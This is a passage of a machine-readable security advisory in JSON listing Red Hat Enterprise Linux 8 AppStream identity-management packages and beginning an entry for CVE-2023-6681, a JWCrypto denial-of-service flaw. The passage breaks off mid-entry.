"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1"
},
"product_reference": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client"
},
"product_reference": "python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1"
},
"product_reference": "python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client"
},
"product_reference": "python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm (idm:client) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client"
},
"product_reference": "pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1"
},
"product_reference": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
},
"product_reference": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-6681",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-01-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2260843"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in JWCrypto. This flaw allows an attacker to cause a denial of service (DoS) attack and possible password brute-force and dictionary attacks to be more resource-intensive. This issue can result in a large amount of computational consumption, causing a denial of service attack.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "JWCrypto: denail of service Via specifically crafted JWE",
"title": "Vulnerability summary"
},
{
"category": "other",
